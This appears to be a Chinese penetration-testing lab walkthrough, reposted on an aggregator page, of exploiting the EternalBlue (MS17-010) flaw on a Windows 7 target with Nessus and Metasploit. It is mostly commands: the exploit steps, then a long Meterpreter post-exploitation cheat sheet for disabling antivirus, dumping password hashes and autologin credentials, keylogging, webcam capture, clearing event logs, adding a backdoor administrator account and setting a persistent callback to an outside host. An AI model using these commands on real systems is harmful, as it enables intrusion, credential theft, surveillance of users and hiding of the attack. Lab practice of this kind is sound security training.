永恒之蓝(MS17 您所在的位置:网站首页 cmd关闭杀毒软件 永恒之蓝(MS17

永恒之蓝(MS17

2023-09-02 01:57| 来源: 网络整理| 查看: 265

环境部署

靶机:win7(172.168.100.158) 工具机:kali,nessus

攻击步骤 1、nessus扫描靶机

在这里插入图片描述

2、根据扫描结果查看靶机漏洞

在这里插入图片描述

3、发现靶机存在永恒之蓝(MS17-010)漏洞

在这里插入图片描述

4、打开工具机kali,打开MSF漏洞利用框架

在这里插入图片描述

5、搜索相关漏洞利用模块

在这里插入图片描述

5、利用MS17-010漏洞攻击模块进行攻击 (1)use调用攻击模块

在这里插入图片描述

(2)options查看需要进行的设置

在这里插入图片描述

(3)set命令设置rhost(目标主机)

在这里插入图片描述

(4)run(exploit)进行攻击

攻击成功

6、攻击成功。获取权限

在这里插入图片描述

渗透常用命令

下面展示一些 msf及后渗透常用命令。

// 常用命令 chcp 65001 #shell 编码乱码 run post/windows/manage/migrate #自动进程迁移 run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上 run post/windows/manage/killav #关闭杀毒软件 run post/windows/manage/enable_rdp #开启远程桌面服务 run post/windows/manage/autoroute #查看路由信息 run post/windows/gather/enum_logged_on_users #列举当前登录的用户 run post/windows/gather/enum_applications #列举应用程序 run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码 run windows/gather/smart_hashdump #dump出所有用户的hash clearev #清除事件日志 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 run hashdump #导出密码的哈希 load kiwi #加载 ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下 getpid #查看当前Meterpreter Shell的进程 PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 idletime #查看主机运行时间 getuid #查看获取的当前权限 getsystem #提权 run killav #关闭杀毒软件 screenshot #截图 webcam_list #查看目标主机的摄像头 webcam_snap #拍照 webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 run getgui -u hack -p 123 #创建hack用户,密码为123 run getgui -e #开启远程桌面 keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 keyscan_stop #停止键盘记录功能 uictl disable keyboard #禁止目标使用键盘 uictl enable keyboard #允许目标使用键盘 uictl disable mouse #禁止目标使用鼠标 uictl enable mouse #允许目标使用鼠标 load #使用扩展库 run #使用扩展库 run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接 192.168.27的4444端口,缺点是容易被杀毒软件查杀 portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址 clearev #清除日志 命令示例

Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。 sysinfo #查看目标主机系统信息 在这里插入图片描述

run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上 在这里插入图片描述 run post/windows/manage/migrate #自动进程迁移 在这里插入图片描述 run post/windows/manage/killav #关闭杀毒软件,由于靶机未装杀毒软件。所以未发现进程 在这里插入图片描述 run post/windows/manage/enable_rdp #开启远程桌面服务 在这里插入图片描述 run post/windows/gather/enum_logged_on_users #列举当前登录的用户 在这里插入图片描述 run windows/gather/smart_hashdump #dump出所有用户的hash 在这里插入图片描述

获取权限后shell,输入shell发现乱码,这是编码问题 在这里插入图片描述

输入chcp 65001解决乱码问题 在这里插入图片描述

增加用户并提权 net user 用户名 密码 /add net localgroup administrators test /add 在这里插入图片描述 查看ip,利用创建好的账号密码远程登陆 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有